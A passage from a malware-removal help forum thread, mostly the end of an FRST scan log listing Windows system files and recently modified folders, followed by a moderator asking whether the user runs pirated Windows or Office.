2018-09-12 04:46 - 2018-08-09 04:09 - 000217088 _____ (Microsoft Corporation) C:\WINDOWS\system32\dinput8.dll
2018-09-12 04:46 - 2018-08-09 04:09 - 000165376 _____ (Microsoft Corporation) C:\WINDOWS\system32\dinput.dll
2018-09-12 04:46 - 2018-08-09 03:36 - 000660896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicensingWinRT.dll
2018-09-12 04:46 - 2018-08-09 03:36 - 000221120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EditionUpgradeManagerObj.dll
2018-09-12 04:46 - 2018-08-09 03:24 - 000131072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fdeploy.dll
2018-09-12 04:46 - 2018-08-09 03:23 - 000291328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnrollUI.dll
2018-09-12 04:46 - 2018-08-09 03:22 - 000668160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2018-09-12 04:46 - 2018-08-09 03:22 - 000429568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certreq.exe
2018-09-12 04:46 - 2018-08-09 03:21 - 002016768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2018-09-12 04:46 - 2018-08-09 03:21 - 001274368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certutil.exe
2018-09-12 04:46 - 2018-08-09 03:20 - 002401792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AcGenral.dll
2018-09-12 04:46 - 2018-08-09 03:20 - 000178688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dinput8.dll
2018-09-12 04:46 - 2018-08-09 03:20 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dinput.dll
2018-09-12 04:46 - 2018-08-09 00:01 - 000777400 _____ (Microsoft Corporation) C:\WINDOWS\system32\pkeyhelper.dll
2018-09-12 04:46 - 2018-08-08 23:55 - 000230304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tpm.sys
2018-09-12 04:46 - 2018-08-08 23:54 - 000375704 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2018-09-12 04:46 - 2018-08-08 23:54 - 000203568 _____ (Microsoft Corporation) C:\WINDOWS\system32\rsaenh.dll
2018-09-12 04:46 - 2018-08-08 23:53 - 001947720 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2018-09-12 04:46 - 2018-08-08 23:53 - 001026456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2018-09-12 04:46 - 2018-08-08 23:53 - 000125600 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptxml.dll
2018-09-12 04:46 - 2018-08-08 23:30 - 000183992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rsaenh.dll
2018-09-12 04:46 - 2018-08-08 23:29 - 000099208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptxml.dll
2018-09-12 04:46 - 2018-08-08 23:28 - 001589248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Globalization.dll
2018-09-12 04:46 - 2018-08-08 23:27 - 000117248 _____ (Microsoft Corporation) C:\WINDOWS\system32\eShims.dll
2018-09-12 04:46 - 2018-08-08 23:27 - 000051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnrollCtrl.exe
2018-09-12 04:46 - 2018-08-08 23:26 - 000990720 _____ (Microsoft Corporation) C:\WINDOWS\system32\IKEEXT.DLL
2018-09-12 04:46 - 2018-08-08 23:26 - 000572416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.UX.EapRequestHandler.dll
2018-09-12 04:46 - 2018-08-08 23:26 - 000528384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\nwifi.sys
2018-09-12 04:46 - 2018-08-08 23:26 - 000238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\TtlsAuth.dll
2018-09-12 04:46 - 2018-08-08 23:26 - 000221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\TtlsCfg.dll
2018-09-12 04:46 - 2018-08-08 23:25 - 000797184 _____ (Microsoft Corporation) C:\WINDOWS\system32\certca.dll
2018-09-12 04:46 - 2018-08-08 23:25 - 000460288 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
2018-09-12 04:46 - 2018-08-08 23:25 - 000392704 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicSvc.dll
2018-09-12 04:46 - 2018-08-08 23:25 - 000145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2018-09-12 04:46 - 2018-08-08 23:23 - 000916992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2018-09-12 04:46 - 2018-08-08 23:22 - 001586176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2018-09-12 04:46 - 2018-08-08 23:22 - 000316928 _____ (Microsoft Corporation) C:\WINDOWS\system32\GlobCollationHost.dll
2018-09-12 04:46 - 2018-08-08 23:13 - 001189376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Globalization.dll
2018-09-12 04:46 - 2018-08-08 23:13 - 000042496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnrollCtrl.exe
2018-09-12 04:46 - 2018-08-08 23:12 - 000652288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certca.dll
2018-09-12 04:46 - 2018-08-08 23:11 - 000350208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
2018-09-12 04:46 - 2018-08-08 23:11 - 000178176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TtlsAuth.dll
2018-09-12 04:46 - 2018-08-08 23:11 - 000164864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TtlsCfg.dll
2018-09-12 04:46 - 2018-08-08 23:11 - 000122368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2018-09-12 04:46 - 2018-08-08 23:10 - 000835584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2018-09-12 04:46 - 2018-08-08 23:09 - 001466368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2018-09-12 04:46 - 2018-08-08 23:08 - 000195584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GlobCollationHost.dll
2018-09-12 04:46 - 2018-08-08 22:08 - 000806416 _____ C:\WINDOWS\SysWOW64\locale.nls
2018-09-12 04:46 - 2018-08-08 22:08 - 000806416 _____ C:\WINDOWS\system32\locale.nls

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-10-10 18:36 - 2018-04-11 18:38 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2018-10-10 18:33 - 2018-08-17 01:04 - 000931448 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2018-10-10 18:33 - 2018-04-11 18:36 - 000000000 ____D C:\WINDOWS\INF
2018-10-10 18:29 - 2018-08-17 01:20 - 000000000 ___RD C:\Users\Christopher&Gabriell\3D Objects
2018-10-10 18:29 - 2018-08-16 19:20 - 000000000 __RHD C:\Users\Public\AccountPictures
2018-10-10 18:29 - 2018-04-11 18:38 - 000000000 ____D C:\WINDOWS\AppReadiness
2018-10-10 18:26 - 2018-08-17 14:59 - 000000422 _____ C:\WINDOWS\Tasks\HPCeeScheduleForChristopher&Gabriell.job
2018-10-10 18:26 - 2018-08-17 01:12 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2018-10-10 18:26 - 2018-08-17 00:55 - 000417088 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2018-10-10 18:25 - 2018-08-17 02:19 - 000065536 _____ C:\WINDOWS\system32\spu_storage.bin
2018-10-10 18:25 - 2018-04-11 16:04 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2018-10-10 18:22 - 2018-04-11 18:38 - 000000000 ____D C:\WINDOWS\TextInput
2018-10-10 18:22 - 2018-04-11 18:38 - 000000000 ____D C:\WINDOWS\system32\ShellExperiences
2018-10-10 18:21 - 2018-04-11 18:38 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2018-10-10 18:21 - 2018-04-11 18:38 - 000000000 ____D C:\WINDOWS\bcastdvr
2018-10-10 18:21 - 2018-04-11 18:38 - 000000000 ____D C:\Program Files\Windows Defender
2018-10-10 18:21 - 2018-04-11 18:38 - 000000000 ____D C:\Program Files (x86)\Windows Defender
2018-10-10 18:14 - 2018-08-17 06:43 - 000000000 ____D C:\Users\Christopher&Gabriell\Downloads\Opera
2018-10-10 17:49 - 2018-08-17 00:55 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2018-10-10 15:52 - 2018-08-17 14:59 - 000003406 _____ C:\WINDOWS\System32\Tasks\HPCeeScheduleForChristopher&Gabriell
2018-10-10 07:36 - 2018-04-11 18:30 - 000000000 ____D C:\WINDOWS\CbsTemp
2018-10-10 04:01 - 2018-08-25 01:06 - 000004636 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player PPAPI Notifier
2018-10-10 04:01 - 2018-04-11 18:38 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed
2018-10-10 04:01 - 2018-04-11 18:38 - 000000000 ____D C:\WINDOWS\system32\Macromed
2018-10-10 01:15 - 2012-07-26 00:26 - 000000167 _____ C:\WINDOWS\win.ini
2018-10-10 01:03 - 2018-04-11 18:34 - 000035232 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2018-10-10 01:02 - 2018-04-11 18:34 - 000494400 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcryptprimitives.dll
2018-10-09 20:40 - 2018-04-11 18:38 - 000000000 ___HD C:\Program Files\WindowsApps
2018-10-07 01:36 - 2018-08-17 01:04 - 000000000 ____D C:\Users\Christopher&Gabriell
2018-10-06 23:33 - 2018-08-31 01:15 - 000000000 ____D C:\Users\Christopher&Gabriell\Downloads\Microsoft Office 2010 Proffesional
2018-10-06 02:46 - 2018-08-19 04:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinPatrol
2018-10-06 02:14 - 2018-08-28 20:24 - 000000000 __SHD C:\Users\Christopher&Gabriell\AppData\Roaming\wow64_microsoft-windows-t..phoneutil.resources_31bf3856ad364e35_10.0.17134.1_ru-ru_7075f1f8a024a234
2018-10-06 02:11 - 2018-08-28 20:22 - 000000000 ____D C:\Program Files (x86)\KMSPico 10.2.1 Final
2018-10-04 17:33 - 2018-08-20 16:19 - 000000000 ____D C:\ProgramData\Packages
2018-10-04 02:01 - 2018-08-31 01:14 - 000000000 ____D C:\Users\Christopher&Gabriell\AppData\Roaming\qBittorrent
2018-10-02 15:13 - 2018-08-18 20:14 - 000835152 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2018-10-02 15:13 - 2018-08-18 20:14 - 000179792 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2018-09-30 01:25 - 2018-08-28 20:27 - 000000000 ____D C:\WINDOWS\Minidump
2018-09-30 01:01 - 2018-04-11 18:38 - 000000000 ____D C:\WINDOWS\InfusedApps
2018-09-30 00:45 - 2018-04-11 18:38 - 000000000 ____D C:\WINDOWS\registration
2018-09-30 00:45 - 2018-04-11 18:38 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2018-09-28 16:49 - 2018-08-31 01:45 - 000000000 ____D C:\Users\Christopher&Gabriell\AppData\Local\Microsoft Help
2018-09-25 02:28 - 2018-08-19 04:26 - 000000000 ____D C:\Users\Christopher&Gabriell\AppData\Local\ElevatedDiagnostics
2018-09-25 01:33 - 2018-08-17 01:12 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2018-09-22 12:22 - 2018-08-17 01:28 - 000000000 ____D C:\Users\Christopher&Gabriell\AppData\Local\D3DSCache
2018-09-22 12:04 - 2018-08-16 18:54 - 000000000 ____D C:\ProgramData\CyberLink
2018-09-21 03:01 - 2018-08-16 18:33 - 000000000 ____D C:\WINDOWS\SysWOW64\sda
2018-09-21 02:40 - 2012-08-03 19:02 - 000000000 ____D C:\SWSetup
2018-09-21 01:58 - 2018-08-16 18:45 - 000000000 ____D C:\ProgramData\install_clap
2018-09-21 01:44 - 2018-08-16 18:38 - 000000000 ____D C:\Program Files (x86)\Hewlett-Packard
2018-09-21 01:44 - 2012-09-18 21:56 - 000000000 ____D C:\Program Files\Hewlett-Packard
2018-09-21 01:27 - 2018-08-16 18:33 - 000000000 ____D C:\Program Files (x86)\Realtek
2018-09-21 01:10 - 2018-08-16 18:44 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Productivity and Tools
2018-09-20 04:51 - 2012-08-03 19:02 - 000000000 ___HD C:\SYSTEM.SAV
2018-09-20 03:37 - 2018-08-16 18:32 - 000000000 ____D C:\ProgramData\AMD
2018-09-20 02:13 - 2018-08-17 02:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP Help and Support
2018-09-20 02:13 - 2018-08-17 02:30 - 000000000 ____D C:\Program Files (x86)\HP
2018-09-20 01:28 - 2018-08-16 18:31 - 000000000 ____D C:\Program Files (x86)\ATI Technologies
2018-09-18 21:13 - 2018-08-17 06:10 - 000004352 _____ C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1534504190
2018-09-18 21:13 - 2018-08-17 06:09 - 000001551 _____ C:\Users\Christopher&Gabriell\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Opera Browser.lnk
2018-09-16 22:15 - 2018-08-17 01:30 - 000003414 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2942939960-1714500650-1008813090-1002
2018-09-16 22:15 - 2018-08-17 01:28 - 000000000 ___RD C:\Users\Christopher&Gabriell\OneDrive
2018-09-16 22:15 - 2018-08-17 01:04 - 000002456 _____ C:\Users\Christopher&Gabriell\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2018-09-14 21:19 - 2018-08-16 17:49 - 000000000 ____D C:\Users\Christopher&Gabriell\AppData\Local\Packages
2018-09-13 17:45 - 2018-04-11 18:38 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2018-09-13 17:45 - 2018-04-11 18:38 - 000000000 ____D C:\WINDOWS\system32\oobe
2018-09-13 17:44 - 2018-04-11 16:04 - 000000000 ____D C:\WINDOWS\system32\Dism
2018-09-12 05:36 - 2018-08-25 01:06 - 000004422 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater

==================== Files in the root of some directories =======

2018-09-14 03:17 - 2018-09-16 23:21 - 017190912 _____ () C:\Users\Christopher&Gabriell\AppData\Roaming\Sandra.mdb

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2018-08-17 00:55

==================== End of FRST.txt ============================
Attached Files
File Type: txt Addition.txt (38.8 KB, 8 views)
Old 10-11-2018, 08:31 PM   #4
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello angelgabbby. Are you running an illegal (pirated) copy of Windows, Office, or both?

All times are GMT -7.